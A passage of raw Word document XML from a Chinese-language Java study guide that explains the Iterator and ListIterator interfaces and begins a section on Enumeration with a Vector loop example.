          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要求容器返回一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。第一次调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>next()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法时，它返回序列的第一个元素。</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iterator()</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.lang.Iterable</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidR="00D56227" w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>唯一的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>继承</w:t>
      </w:r>
      <w:r w:rsidR="00A62DE8" w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>子</w:t>
      </w:r>
      <w:r w:rsidR="00A62DE8" w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Iterable</w:t>
      </w:r>
      <w:r w:rsidR="00A62DE8" w:rsidRPr="00195656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>next()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获得序列中的下一个元素。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hasNext()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>检查序列中是否还有元素。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>remove()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将迭代器新返回的元素删除。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>迭代器最简单的实现，为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>设计的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ListIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>具有更多的功能，它可以从</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>两个方向遍历</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，也可以从</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C452C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中插入和删除元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851F6B" w:rsidRDefault="00851F6B" w:rsidP="00851F6B">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851F6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2993366" cy="2088395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="图片 76" descr="C:\Servyou\RealLine\IMClient\SnapShotTemp\201607111447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Servyou\RealLine\IMClient\SnapShotTemp\20160711144713.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002331" cy="2094650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851F6B" w:rsidRPr="00851F6B" w:rsidRDefault="00851F6B" w:rsidP="00851F6B">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851F6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3950265" cy="819510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77" name="图片 77" descr="C:\Servyou\RealLine\IMClient\SnapShotTemp\201607111448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Servyou\RealLine\IMClient\SnapShotTemp\20160711144808.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072344" cy="844836"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851F6B" w:rsidRPr="00851F6B" w:rsidRDefault="00851F6B" w:rsidP="00851F6B">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00851F6B" w:rsidRDefault="00851F6B" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口继承自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Iterable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00851F6B" w:rsidRDefault="00851F6B" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00851F6B" w:rsidRDefault="00851F6B" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C452C2" w:rsidRPr="00B50BC7" w:rsidRDefault="00C452C2" w:rsidP="00C452C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.23.2 </w:t>
      </w:r>
      <w:r w:rsidR="00147693" w:rsidRPr="00147693">
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列举</w:t>
      </w:r>
      <w:r w:rsidR="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRPr="00504C17" w:rsidRDefault="00504C17" w:rsidP="00F43611">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>public interface Enumeration&lt;E&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接口的对象，它生成一系列元素，一次生成一个。连续调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nextElement </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法将返回一系列的连续元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRPr="00504C17" w:rsidRDefault="00504C17" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>例如，要输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vector&lt;E&gt; v </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的所有元素，可使用以下方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRPr="00504C17" w:rsidRDefault="00504C17" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for (Enumeration&lt;E&gt; e = v.</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(); e.hasMoreElements();)</w:t>
      </w:r>
